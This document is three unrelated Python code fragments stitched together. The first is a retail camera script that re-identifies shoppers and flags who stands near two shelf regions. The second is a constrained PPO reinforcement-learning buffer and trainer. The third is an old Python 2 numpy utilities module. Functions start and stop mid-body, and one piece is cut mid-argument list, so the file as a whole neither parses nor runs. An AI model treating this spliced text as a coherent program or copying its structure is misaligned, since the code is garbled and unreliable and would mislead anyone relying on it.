rentidir = '/home/tujh/renti/'
pkl_file = open('/data/reid/renti/data.pkl', 'rb')
shujuku = pickle.load(pkl_file)
#for feature2,filename in shujuku:
for query in shujuku:
for fea in shujuku[query]:
distan = pairwise_distance(feature,fea)
if minsim > distan or minsim == -1:
minsim = distan
id_name = int(query)
cv2.rectangle(frame, (left, top), (right, bottom), (255, 0, 0), 2)
cv2.putText(frame, str(id_name), (left,top), cv2.FONT_HERSHEY_COMPLEX, 6, (255,0,0),2)
# draw the goods (shangpin) area
left_x, top_y, right_m, bottom_n = shangpin_area()
cv2.rectangle(frame, (left_x, top_y), (right_m, bottom_n), (0, 255, 0), 2)
left_x_2, top_y_2, right_m_2, bottom_n_2 = shangpin_area_huojia2()
cv2.rectangle(frame, (left_x_2, top_y_2), (right_m_2, bottom_n_2), (255, 0, 0), 2)
#print(left, top, right, bottom)
return left,top,right,bottom,id_name
normalizer = T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
test_transformer = T.Compose([T.ToTensor(),
normalizer,
])
# the goods (shangpin) area
def shangpin_area():
#detect_region = config.config['CameraConfig']['camera_7']['detect_region'] #11/17
#left_x = detect_region[0]
#top_y = detect_region[1] - 80
#right_m = detect_region[2]
#bottom_n = detect_region[3] + 60
#left_x = 610
#top_y = 31
#right_m = 350
#bottom_n = 369
#left_x = 678
#top_y = 4
#right_m = 300
#bottom_n = 330
left_x = 570
top_y = 3
right_m = 451
bottom_n = 231
return left_x,top_y,right_m,bottom_n
def shangpin_area_huojia2():
#detect_region = config.config['CameraConfig']['camera_7']['detect_region'] #11/17
#left_x = detect_region[0]
#top_y = detect_region[1] - 80
#right_m = detect_region[2]
#bottom_n = detect_region[3] + 60
#left_x = 910
#top_y = 31
#right_m = 350
#bottom_n = 369
#left_x = 1100
#top_y = 30
#right_m = 673
#bottom_n = 400
left_x = 410
top_y = 49
right_m = 182
bottom_n = 235
return left_x,top_y,right_m,bottom_n
# initialize the flags of all the people we detected
def initial_flag(left,top,right,bottom):
left_x,top_y,right_m,bottom_n = shangpin_area()
calcIOU1 = newcalcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
#calcIOU1 = calcIOU_old(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
#print(calcIOU1)
if calcIOU1 > 0.5:
flag = 1
else:
flag = 0
return flag
def initial_flag_out(left,top,right,bottom):
left_x,top_y,right_m,bottom_n = shangpin_area()
calcIOU1 = newcalcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
if calcIOU1 > 0:
flag = 1
else:
flag = 0
return flag
def initial_flag_huojia2(left,top,right,bottom):
left_x,top_y,right_m,bottom_n = shangpin_area_huojia2()
#print('huojia2_initial')
calcIOU1 = newcalcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
if calcIOU1 > 0.5:
flag = 1
else:
flag = 0
return flag
def initial_flag_out_huojia2(left,top,right,bottom):
left_x,top_y,right_m,bottom_n = shangpin_area_huojia2()
calcIOU1 = newcalcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
if calcIOU1 > 0:
flag = 1
else:
flag = 0
return flag
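`newcalcIOU`, which all four flag functions above call, is defined elsewhere in this file; for reference, here is a minimal sketch of a standard intersection-over-union for `(left, top, right, bottom)` boxes (the exact semantics of `newcalcIOU` are an assumption, and the name below is hypothetical):

```python
def iou_sketch(l1, t1, r1, b1, l2, t2, r2, b2):
    # Intersection rectangle; width/height clamp to 0 when the boxes are disjoint.
    iw = max(0, min(r1, r2) - max(l1, l2))
    ih = max(0, min(b1, b2) - max(t1, t2))
    inter = iw * ih
    union = (r1 - l1) * (b1 - t1) + (r2 - l2) * (b2 - t2) - inter
    return inter / union if union > 0 else 0.0
```

With such a function, a threshold of 0.5 (as in `initial_flag`) asks for substantial overlap with the product region, while the `> 0` test in `initial_flag_out` fires on any overlap at all.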
def xuanze_original(res, frame, model, cfg, threadPubMsg, camera_id, dic_change, dic_change_huojia2, huojia1_id, huojia2_id):
dic = {}
#left_x, top_y, right_m, bottom_n = shangpin_area()
#cv2.rectangle(frame, (left_x, top_y), (right_m, bottom_n), (0, 255, 0), 2)
dic_huojia2 = {}
#left_x_2, top_y_2, right_m_2, bottom_n_2 = shangpin_area_huojia2()
#cv2.rectangle(frame, (left_x_2, top_y_2), (right_m_2, bottom_n_2), (0, 255, 0), 2)
if len(res) == 1:
result = res[0]
left,top,right,bottom,id_name = reid_draw(frame, result, model, cfg)
if id_name in dic_change:
if dic_change[id_name] == 1:
flag = initial_flag_out(left,top,right,bottom)
else:
flag = initial_flag(left,top,right,bottom)
else:
flag = initial_flag(left, top,right,bottom)
dic[id_name] = flag
if id_name in dic_change_huojia2:
if dic_change_huojia2[id_name] == 1:
flag = initial_flag_out_huojia2(left,top,right,bottom)
else:
flag = initial_flag_huojia2(left,top,right,bottom)
else:
flag = initial_flag_huojia2(left, top,right,bottom)
dic_huojia2[id_name] = flag
elif len(res) > 1:
for item in res:
result = item
if (len(result) > 0):
left,top,right,bottom,id_name = reid_draw(frame, result, model, cfg)
if id_name in dic_change:
if dic_change[id_name] == 1:
flag = initial_flag_out(left,top,right,bottom)
else:
flag = initial_flag(left,top,right,bottom)
else:
flag = initial_flag(left, top,right,bottom)
dic[id_name] = flag
if id_name in dic_change_huojia2:
if dic_change_huojia2[id_name] == 1:
flag = initial_flag_out_huojia2(left,top,right,bottom)
else:
flag = initial_flag_huojia2(left,top,right,bottom)
else:
flag = initial_flag_huojia2(left, top,right,bottom)
dic_huojia2[id_name] = flag
return dic,dic_huojia2
def people_list(res):
peolist = []
left_x,top_y,right_m,bottom_n = shangpin_area()
for b_b in res:
global size
left=int((b_b[0] - b_b[2]/2.0) * size[0])
top=int((b_b[1]- b_b[3]/2.0) * size[1])
right=int((b_b[0] + b_b[2]/2.0) * size[0])
bottom=int((b_b[1] + b_b[3]/2.0) * size[1])
if calcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)>0:
x1,x2,x3,x4 = coordinate_IOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
peolist.append(x1)
peolist.append(x2)
peolist.append(x3)
peolist.append(x4)
return peolist
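`people_list` converts each normalized YOLO-style detection (center-x, center-y, width, height in [0, 1]) into pixel corners using the frame `size`; that conversion in isolation, as a small helper (the name is hypothetical):

```python
def to_corners(b_b, size):
    """Convert a normalized (cx, cy, w, h) box to pixel (left, top, right, bottom)."""
    left   = int((b_b[0] - b_b[2] / 2.0) * size[0])
    top    = int((b_b[1] - b_b[3] / 2.0) * size[1])
    right  = int((b_b[0] + b_b[2] / 2.0) * size[0])
    bottom = int((b_b[1] + b_b[3] / 2.0) * size[1])
    return left, top, right, bottom
```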
# choose the person closest to the product region
def xuanze(res, frame, model, cfg, threadPubMsg, camera_id, dic, change_dic, dic_huojia2, change_dic_huojia2, huojia1_id, huojia2_id):
for item in res:
result = item
# add new person
if (len(result) > 0):
left, top, right, bottom, id_name = reid_draw(frame, result, model, cfg)
import numpy as np
import torch
from torch.optim import Adam
import gym
import time
import yaml
import safe_rl.algos.cppo.core as core
from safe_rl.utils.logx import EpochLogger
from safe_rl.utils.mpi_pytorch import setup_pytorch_for_mpi, sync_params, mpi_avg_grads
from safe_rl.utils.mpi_tools import (mpi_fork, mpi_avg, proc_id, mpi_statistics_scalar,
num_procs, mpi_sum)
from extra_envs.wrappers import Intervention
from extra_envs.intervener.base import Intervener
class CPPOBuffer:
"""
A buffer for storing trajectories experienced by a PPO agent interacting
with the environment, and using Generalized Advantage Estimation (GAE-Lambda)
for calculating the advantages of state-action pairs.
"""
def __init__(self, obs_dim, act_dim, size, gamma=0.99, lam=0.95, scaling=1.,
normalize_adv=False):
self.obs_buf = np.zeros(core.combined_shape(size, obs_dim), dtype=np.float32)
self.act_buf = np.zeros(core.combined_shape(size, act_dim), dtype=np.float32)
# Associated with task reward
self.adv_buf = np.zeros(size, dtype=np.float32)
self.rew_buf = np.zeros(size, dtype=np.float32)
self.ret_buf = np.zeros(size, dtype=np.float32)
self.val_buf = np.zeros(size, dtype=np.float32)
# Associated with task cost
self.cadv_buf = np.zeros(size, dtype=np.float32)
self.cost_buf = np.zeros(size, dtype=np.float32)
self.cret_buf = np.zeros(size, dtype=np.float32)
self.cval_buf = np.zeros(size, dtype=np.float32)
self.intv_buf = np.zeros(size, dtype=bool)  # np.bool is removed in newer NumPy
self.logp_buf = np.zeros(size, dtype=np.float32)
self.normalize_adv = normalize_adv
self.gamma, self.lam, self.scaling = gamma, lam, scaling
self.ptr, self.path_start_idx, self.max_size = 0, 0, size
def store(self, obs, act, rew, val, cost, cval, intv, logp):
"""
Append one timestep of agent-environment interaction to the buffer.
"""
assert self.ptr < self.max_size # buffer has to have room so you can store
self.obs_buf[self.ptr] = obs
self.act_buf[self.ptr] = act
# Reward
self.rew_buf[self.ptr] = self.scaling*rew
self.val_buf[self.ptr] = val
# Cost
self.cost_buf[self.ptr] = self.scaling*cost
self.cval_buf[self.ptr] = cval
self.intv_buf[self.ptr] = intv
self.logp_buf[self.ptr] = logp
self.ptr += 1
def finish_path(self, last_val=0, last_cval=0):
"""
Call this at the end of a trajectory, or when one gets cut off
by an epoch ending. This looks back in the buffer to where the
trajectory started, and uses rewards and value estimates from
the whole trajectory to compute advantage estimates with GAE-Lambda,
as well as compute the rewards-to-go for each state, to use as
the targets for the value function.
The "last_val" argument should be 0 if the trajectory ended
because the agent reached a terminal state (died), and otherwise
should be V(s_T), the value function estimated for the last state.
This allows us to bootstrap the reward-to-go calculation to account
for timesteps beyond the arbitrary episode horizon (or epoch cutoff).
"""
path_slice = slice(self.path_start_idx, self.ptr)
###########
# Rewards #
###########
rews = np.append((1-self.gamma)*self.rew_buf[path_slice], last_val)
vals = np.append(self.val_buf[path_slice], last_val)
# the next two lines implement GAE-Lambda advantage calculation
deltas = rews[:-1] + self.gamma * vals[1:] - vals[:-1]
self.adv_buf[path_slice] = core.discount_cumsum(deltas, self.gamma * self.lam)
# the next line computes rewards-to-go, to be targets for the value function
self.ret_buf[path_slice] = core.discount_cumsum(rews, self.gamma)[:-1]
#########
# Costs #
#########
costs = np.append((1-self.gamma)*self.cost_buf[path_slice], last_cval)
cvals = np.append(self.cval_buf[path_slice], last_cval)
cdeltas = costs[:-1] + self.gamma*cvals[1:] - cvals[:-1]
self.cadv_buf[path_slice] = core.discount_cumsum(cdeltas, self.gamma*self.lam)
self.cret_buf[path_slice] = core.discount_cumsum(costs, self.gamma)[:-1]
self.path_start_idx = self.ptr
def get(self, log_penalty=-np.inf):
"""
Call this at the end of an epoch to get all of the data from
the buffer, with advantages appropriately normalized (shifted to have
mean zero and std one). Also, resets some pointers in the buffer.
"""
assert self.ptr == self.max_size # buffer has to be full before you can get
self.ptr, self.path_start_idx = 0, 0
# the next two lines implement the advantage normalization trick
weight = 1/(1 + np.exp(-log_penalty))
lagrange_adv_buf = (1-weight)*self.adv_buf - weight*self.cadv_buf
adv_mean, adv_std = mpi_statistics_scalar(lagrange_adv_buf)
lagrange_adv_buf = lagrange_adv_buf - adv_mean
lagrange_adv_buf /= (adv_std if self.normalize_adv else self.scaling)
data = dict(obs=self.obs_buf, act=self.act_buf, ret=self.ret_buf,
cret=self.cret_buf, adv=lagrange_adv_buf, logp=self.logp_buf)
out = {k: torch.as_tensor(v, dtype=torch.float32) for k,v in data.items()}
out.update(intv=self.intv_buf)
return out
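`finish_path` above leans on `core.discount_cumsum`; a minimal NumPy sketch of that helper and of the GAE-Lambda delta computation it feeds (a toy illustration, not the project's actual `core` module):

```python
import numpy as np

def discount_cumsum(x, discount):
    # y[t] = x[t] + discount * y[t+1], computed backwards over the path.
    out = np.zeros_like(x, dtype=np.float64)
    running = 0.0
    for t in reversed(range(len(x))):
        running = x[t] + discount * running
        out[t] = running
    return out

# GAE-Lambda on a toy 3-step path, bootstrapping with last_val = 0.
rews = np.array([1.0, 1.0, 1.0, 0.0])   # rewards with last_val appended
vals = np.array([0.5, 0.5, 0.5, 0.0])   # value estimates with last_val appended
gamma, lam = 0.99, 0.95
deltas = rews[:-1] + gamma * vals[1:] - vals[:-1]
adv = discount_cumsum(deltas, gamma * lam)
```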
def cppo(env_fn, actor_critic=core.MLPActorCritic, ac_kwargs=dict(), seed=0,
steps_per_epoch=4000, epochs=50, gamma=0.99, clip_ratio=0.2, pi_lr=3e-4,
vf_lr=1e-3, train_pi_iters=80, train_v_iters=80, lam=0.97, max_ep_len=1000,
target_kl=0.01, logger_kwargs=dict(), save_freq=10,
num_test_episodes=10, ent_bonus=0.001, scaling=100., dont_normalize_adv=False,
# Cost constraint/penalties
cost_lim=0.01, penalty=1., penalty_lr=5e-2, update_penalty_every=1,
optimize_penalty=False, ignore_unsafe_cost=False
):
"""
Proximal Policy Optimization (by clipping),
with early stopping based on approximate KL
Args:
env_fn : A function which creates a copy of the environment.
The environment must satisfy the OpenAI Gym API.
actor_critic: The constructor method for a PyTorch Module with a
``step`` method, an ``act`` method, a ``pi`` module, and a ``v``
module. The ``step`` method should accept a batch of observations
and return:
=========== ================ ======================================
Symbol Shape Description
=========== ================ ======================================
``a`` (batch, act_dim) | Numpy array of actions for each
| observation.
``v`` (batch,) | Numpy array of value estimates
| for the provided observations.
``logp_a`` (batch,) | Numpy array of log probs for the
| actions in ``a``.
=========== ================ ======================================
The ``act`` method behaves the same as ``step`` but only returns ``a``.
The ``pi`` module's forward call should accept a batch of
observations and optionally a batch of actions, and return:
=========== ================ ======================================
Symbol Shape Description
=========== ================ ======================================
``pi`` N/A | Torch Distribution object, containing
| a batch of distributions describing
| the policy for the provided observations.
``logp_a`` (batch,) | Optional (only returned if batch of
| actions is given). Tensor containing
| the log probability, according to
| the policy, of the provided actions.
| If actions not given, will contain
| ``None``.
=========== ================ ======================================
The ``v`` module's forward call should accept a batch of observations
and return:
=========== ================ ======================================
Symbol Shape Description
=========== ================ ======================================
``v`` (batch,) | Tensor containing the value estimates
| for the provided observations. (Critical:
| make sure to flatten this!)
=========== ================ ======================================
ac_kwargs (dict): Any kwargs appropriate for the ActorCritic object
you provided to PPO.
seed (int): Seed for random number generators.
steps_per_epoch (int): Number of steps of interaction (state-action pairs)
for the agent and the environment in each epoch.
epochs (int): Number of epochs of interaction (equivalent to
number of policy updates) to perform.
gamma (float): Discount factor. (Always between 0 and 1.)
clip_ratio (float): Hyperparameter for clipping in the policy objective.
Roughly: how far can the new policy go from the old policy while
still profiting (improving the objective function)? The new policy
can still go farther than the clip_ratio says, but it doesn't help
on the objective anymore. (Usually small, 0.1 to 0.3.) Typically
denoted by :math:`\epsilon`.
pi_lr (float): Learning rate for policy optimizer.
vf_lr (float): Learning rate for value function optimizer.
train_pi_iters (int): Maximum number of gradient descent steps to take
on policy loss per epoch. (Early stopping may cause optimizer
to take fewer than this.)
train_v_iters (int): Number of gradient descent steps to take on
value function per epoch.
lam (float): Lambda for GAE-Lambda. (Always between 0 and 1,
close to 1.)
max_ep_len (int): Maximum length of trajectory / episode / rollout.
target_kl (float): Roughly what KL divergence we think is appropriate
between new and old policies after an update. This will get used
for early stopping. (Usually small, 0.01 or 0.05.)
logger_kwargs (dict): Keyword args for EpochLogger.
save_freq (int): How often (in terms of gap between epochs) to save
the current policy and value function.
scaling (float): How much to scale the empirical returns to aid in learning the
value function
cost_lim (float): The tolerated cost limit
penalty (float): The initial penalty value
penalty_lr (float): The update size for the penalty
update_penalty_every (int): Number of policy updates between penalty updates
optimize_penalty (bool): Whether to optimize the penalty or keep it fixed
ignore_unsafe_cost (bool): Whether to ignore the unsafe cost when computing
the total cost.
"""
# Special function to avoid certain slowdowns from PyTorch + MPI combo.
setup_pytorch_for_mpi()
# Set up logger and save configuration
logger = EpochLogger(**logger_kwargs)
logger.save_config(locals())
# Random seed
seed += 10000 * proc_id()
torch.manual_seed(seed)
np.random.seed(seed)
# Instantiate environment
env = env_fn()
test_env = env.env
#test_env = gym.make('extra_envs:HalfCheetah-v0')
obs_dim = env.observation_space.shape
act_dim = env.action_space.shape
rew_range = env.reward_range
v_range = (scaling*rew_range[0], scaling*rew_range[1])
vc_range = (0, scaling*1)
max_ep_len = min(max_ep_len, env.env._max_episode_steps)
# Create actor-critic module
ac = actor_critic(env.observation_space, env.action_space, v_range=v_range,
vc_range=vc_range, pred_std=True, **ac_kwargs)
# Sync params across processes
sync_params(ac)
# Count variables
var_counts = tuple(core.count_vars(module) for module in [ac.pi, ac.v])
logger.log('\nNumber of parameters: \t pi: %d, \t v: %d\n' % var_counts)
# Set up experience buffer
local_steps_per_epoch = int(steps_per_epoch / num_procs())
buf = CPPOBuffer(obs_dim, act_dim, local_steps_per_epoch, gamma, lam,
d in range(len(a.shape))])
if no_value:
code += indent + 'yield ' + index
else:
code += indent + 'yield ' + 'a[%s]' % index + ', (' + index + ')'
exec code
return nested_loops, code
def compute_histogram(samples, nbins=50, piecewise_constant=True):
"""
Given a numpy array samples with random samples, this function
returns the (x,y) arrays in a plot-ready version of the histogram.
If piecewise_constant is True, the (x,y) arrays give a piecewise
constant curve when plotted; otherwise they give a piecewise
linear curve whose x coordinates coincide with the center
points of each bin. The function makes use of
numpy.lib.function_base.histogram with some additional code
(for a piecewise curve, or x values displaced to the centers of
the bins).
"""
import sys
if 'numpy' in sys.modules:
y0, bin_edges = histogram(samples, bins=nbins, normed=True)
h = bin_edges[1] - bin_edges[0] # bin width
if piecewise_constant:
x = zeros(2*len(bin_edges), type(bin_edges[0]))
y = x.copy()
x[0] = bin_edges[0]
y[0] = 0
for i in range(len(bin_edges)-1):
x[2*i+1] = bin_edges[i]
x[2*i+2] = bin_edges[i+1]
y[2*i+1] = y0[i]
y[2*i+2] = y0[i]
x[-1] = bin_edges[-1]
y[-1] = 0
else:
x = zeros(len(bin_edges)-1, type(bin_edges[0]))
y = y0.copy()
for i in range(len(x)):
x[i] = (bin_edges[i] + bin_edges[i+1])/2.0
return x, y
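`compute_histogram` above targets the old Numeric/early-NumPy API (`normed=`, `zeros(n, type)`). Under modern NumPy, the same piecewise-constant construction can be sketched far more compactly (function name assumed; `density=True` replaces the removed `normed=True`):

```python
import numpy as np

def hist_curve(samples, nbins=50):
    # Plot-ready piecewise-constant (x, y) arrays of a density histogram.
    y0, edges = np.histogram(samples, bins=nbins, density=True)
    x = np.repeat(edges, 2)                               # e0,e0,e1,e1,...,eN,eN
    y = np.concatenate([[0.0], np.repeat(y0, 2), [0.0]])  # drop to 0 at both ends
    return x, y
```

The `np.repeat` pair reproduces exactly the interleaving that the explicit loop above builds element by element.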
def factorial(n, method='reduce'):
"""
Compute the factorial n! using long integers (and pure Python code).
Different implementations are available (see source code for
implementation details).
Note: The math module in Python 2.6 features a factorial
function, making the present function redundant (except that
the various pure Python implementations can be of interest
for comparison).
Here is an efficiency comparison of the methods (computing 80!):
========================== =====================
Method Normalized CPU time
========================== =====================
reduce 1.00
lambda list comprehension 1.70
lambda functional 3.08
plain recursive 5.83
lambda recursive 21.73
scipy 131.18
========================== =====================
"""
if not isinstance(n, (int, long, float)):
raise TypeError('factorial(n): n must be integer not %s' % type(n))
n = long(n)
if n == 0 or n == 1:
return 1
if method == 'plain iterative':
f = 1
for i in range(1, n+1):
f *= i
return f
elif method == 'plain recursive':
if n == 1:
return 1
else:
return n*factorial(n-1, method)
elif method == 'lambda recursive':
fc = lambda n: n and fc(n-1)*long(n) or 1
return fc(n)
elif method == 'lambda functional':
fc = lambda n: n<=0 or \
reduce(lambda a,b: long(a)*long(b), xrange(1,n+1))
return fc(n)
elif method == 'lambda list comprehension':
fc = lambda n: [j for j in [1] for i in range(2,n+1) \
for j in [j*i]] [-1]
return fc(n)
elif method == 'reduce':
return reduce(operator.mul, xrange(2, n+1))
elif method == 'scipy':
try:
import scipy.misc.common as sc
return sc.factorial(n)
except ImportError:
print 'numpyutils.factorial: scipy is not available'
print 'default method="reduce" is used instead'
return reduce(operator.mul, xrange(2, n+1))
# or return factorial(n)
else:
raise ValueError('factorial: method="%s" is not supported' % method)
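The 'reduce' method, the fastest in the table above, translates directly to Python 3, where `reduce` moved to `functools` and `long`/`xrange` are gone (function name below is hypothetical):

```python
from functools import reduce
import operator

def factorial_reduce(n):
    # n! via functools.reduce; Python 3 ints are arbitrary precision,
    # so no explicit long() conversion is needed.
    if n < 0:
        raise ValueError('n must be non-negative')
    return reduce(operator.mul, range(2, n + 1), 1)
```

The initializer `1` makes the empty products for n = 0 and n = 1 come out correctly.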
def asarray_cpwarn(a, dtype=None, message='warning', comment=''):
"""
Like asarray, but a warning or exception is issued if the
array a is copied.
a_new = asarray(a, dtype)
# must drop numpy's order argument since it conflicts
# with Numeric's savespace
# did we copy?
if a_new is not a:
# we do not return the identical array, i.e., copy has taken place
msg = '%s copy of array %s, from %s to %s' % \
(comment, a.shape, type(a), type(a_new))
if message == 'warning':
print 'Warning: %s' % msg
elif message == 'exception':
raise TypeError(msg)
return a_new
def seq(min=0.0, max=None, inc=1.0, type=float,
return_type='NumPyArray'):
"""
Generate numbers from min to (and including!) max,
with increment of inc. Safe alternative to arange.
The return_type string governs the type of the returned
sequence of numbers ('NumPyArray', 'list', or 'tuple').
"""
if max is None: # allow sequence(3) to be 0., 1., 2., 3.
# take 1st arg as max, min as 0, and inc=1
max = min; min = 0.0; inc = 1.0
r = arange(min, max + inc/2.0, inc, type)
if return_type == 'NumPyArray' or return_type == ndarray:
return r
elif return_type == 'list':
return r.tolist()
elif return_type == 'tuple':
return tuple(r.tolist())
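The endpoint trick in `seq` (stopping at `max + inc/2`) guards against floating-point round-off excluding `max` from a plain `arange`; in isolation, as a modern-NumPy sketch (name hypothetical):

```python
import numpy as np

def seq_sketch(lo, hi, inc):
    # Inclusive arange: pushing the stop to hi + inc/2 ensures hi is
    # included even when accumulated round-off puts the last value
    # slightly above or below hi.
    return np.arange(lo, hi + inc / 2.0, inc)
```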
def iseq(start=0, stop=None, inc=1):
"""
Generate integers from start to (and including) stop,
with increment of inc. Alternative to range/xrange.
"""
if stop is None: # allow isequence(3) to be 0, 1, 2, 3
# take 1st arg as stop, start as 0, and inc=1
stop = start; start = 0; inc = 1
return xrange(start, stop+inc, inc)
sequence = seq # backward compatibility
isequence = iseq # backward compatibility
def arr(shape=None, element_type=float,
interval=None,
data=None, copy=True,
file_=None,
order='C'):
"""
Compact and flexible interface for creating numpy arrays,
including several consistency and error checks.
- *shape*: length of each dimension, tuple or int
- *data*: list, tuple, or numpy array with data elements
- *copy*: copy data if true, share data if false, boolean
- *element_type*: float, int, int16, float64, bool, etc.
- *interval*: make elements from a to b (shape gives no of elms), tuple or list
- *file_*: filename or file object containing array data, string
- *order*: 'Fortran' or 'C' storage, string
- return value: created Numerical Python array
The array can be created in four ways:
1. as zeros (just shape specified),
2. as uniformly spaced coordinates in an interval [a,b]
3. as a copy of or reference to (depending on copy=True,False resp.)
a list, tuple, or numpy array (provided as the data argument),
4. from data in a file (for one- or two-dimensional real-valued arrays).
The function calls the underlying numpy functions zeros, array and
linspace (see the numpy manual for the functionality of these
functions). In case of data in a file, the first line determines
the number of columns in the array. The file format is just rows
and columns with numbers, no decorations (square brackets, commas,
etc.) are allowed.
>>> arr((3,4))
array([[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.]])
>>> arr(4, element_type=int) + 4 # integer array
array([4, 4, 4, 4])
>>> arr(3, interval=[0,2])
array([ 0., 1., 2.])
>>> somelist=[[0,1],[5,5]]
>>> a = arr(data=somelist)
>>> a # a has always float elements by default
array([[ 0., 1.],
[ 5., 5.]])
>>> a = arr(data=somelist, element_type=int)
>>> a
array([[0, 1],
[5, 5]])
>>> b = a + 1
>>> c = arr(data=b, copy=False) # let c share data with b
>>> b is c
True
>>> id(b) == id(c)
True
>>> # make a file with array data:
>>> f = open('tmp.dat', 'w')
>>> f.write('''\
... 1 3
... 2 6
... 3 12
... 3.5 20
... ''')
>>> f.close()
>>> # read array data from file:
>>> a = arr(file_='tmp.dat')
>>> a
array([[ 1. , 3. ],
[ 2. , 6. ],
[ 3. , 12. ],
[ 3.5, 20. ]])
"""
if data is None and file_ is None and shape is None:
return None
if data is not None:
if not operator.isSequenceType(data):
raise TypeError('arr: data argument is not a sequence type')
if isinstance(shape, (list,tuple)):
# check that shape and data are compatible:
if reduce(operator.mul, shape) != size(data):
raise ValueError(
'arr: shape=%s is not compatible with %d '\
'elements in the provided data' % (shape, size(data)))
elif isinstance(shape, int):
if shape != size(data):
raise ValueError(
'arr: shape=%d is not compatible with %d '\
'elements in the provided data' % (shape, size(data)))
elif shape is None:
if isinstance(data, (list,tuple)) and copy == False:
# cannot share data (data is list/tuple)
copy = True
return array(data, dtype=element_type, copy=copy, order=order)
else:
raise TypeError(
'shape is %s, must be list/tuple or int' % type(shape))
elif file_ is not None:
if not isinstance(file_, (basestring, file, StringIO)):
raise TypeError(
'file_ argument must be a string (filename) or '\
'open file object, not %s' % type(file_))
if isinstance(file_, basestring):
file_ = open(file_, 'r')
# skip blank lines:
while True:
line1 = file_.readline().strip()
if line1 != '':
break